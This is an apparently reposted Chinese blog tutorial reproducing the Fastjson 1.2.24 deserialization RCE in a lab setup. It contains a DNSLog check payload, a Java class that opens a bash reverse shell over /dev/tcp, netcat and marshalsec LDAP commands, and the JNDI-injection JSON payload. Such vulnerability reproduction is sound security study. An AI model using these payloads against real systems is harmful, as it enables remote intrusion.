码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • Fastjson 反序列化漏洞[1.2.24-rce]


    漏洞复现环境搭建请参考

    http://t.csdnimg.cn/vSaaw

    kali切换jdk版本请参考

    Kali安装JAVA8和切换JDK版本的详细过程_kali安装jdk8-CSDN博客

    漏洞原理

    Fastjson提供的com.sun.rowset.JdbcRowSetImpl类下的dataSourceName方法支持传入一个RMI/LDAP源,支持远程调用。攻击者只需要创建一个恶意指令类(写入反弹shell等恶意命令),设置RMI/LDAP服务的远程加载指向该恶意类,即可做到远程任意命令执行

    漏洞版本

    fastjson<=1.2.24

    漏洞验证

    (1)Web访问,JSON页面

    (2)BP抓包,利用DNS回显验证,DNSLog Platform

    (3)修改提交方式为POST,加入以下内容,放包,DNS回显则证明漏洞存在

    1. #val的值为DNS申请的域名
    2. Content-Type:application/json
    3. {
    4. "a":{
    5. "@type":"java.net.Inet4Address",
    6. "val":"q6teka.dnslog.cn"
    7. }
    8. }

    漏洞利用

    (1)创建远程加载类,攻击机创建.java文件,内容如下,并进行java编译生成class文件

    1. #执行反弹shell,注意文件名需要和class类名称创建的一样
    2. import java.lang.Runtime;
    3. import java.lang.Process;
    4. public class getshell {
    5. static {
    6. try {
    7. Runtime rt = Runtime.getRuntime();
    8. String[] commands = {"bash", "-c", "bash -i >& /dev/tcp/192.168.88.128/8888 0>&1"};
    9. Process pc = rt.exec(commands);
    10. pc.waitFor();
    11. } catch (Exception e) {
    12. // do nothing
    13. }
    14. }
    15. }

    (2)开启攻击机HTTP服务和反弹shell端口的监听

    1. python3 -m http.server 80
    2. nc -lvvp 8888

    (3)开启LDAP服务

    1. #工具获取
    2. git clone https://github.com/RandomRobbieBF/marshalsec-jar
    3. #开启LADP服务,端口6666,指定远程加载类为攻击机上的getshell
    4. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://192.168.88.128:80/#getshell 6666

    (4)回到站点,BP抓包,发送恶意数据,内容如下

    1. Content-Type:application/json
    2. {
    3. "b":{
    4. "@type":"com.sun.rowset.JdbcRowSetImpl",
    5. "dataSourceName":"ldap://192.168.88.128:6666/getshell",
    6. "autoCommit":true
    7. }
    8. }

    (5)放包,getshell

  • 相关阅读:
    实现动态表单的一种思路
    Docker Dockerfile 文件中设置时区的命令解析
    User Account Status 在CDB 和PDB不一致的情况 OPEN & IN ROLLOVER
    FinClip | 2022 年 10月产品大事记
    xxl-job源码解读(执行器注册调度器)
    ROS 学习应用篇(六)参数的使用与编程
    QT天气预报项目(写在简历上)
    重庆大自考和小自考的区别是什么?
    常见的股东纠纷案例类型及处理方法汇总
    插件_创蓝图文滑动验证码
  • 原文地址:https://blog.csdn.net/W13680336969/article/details/139253595
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号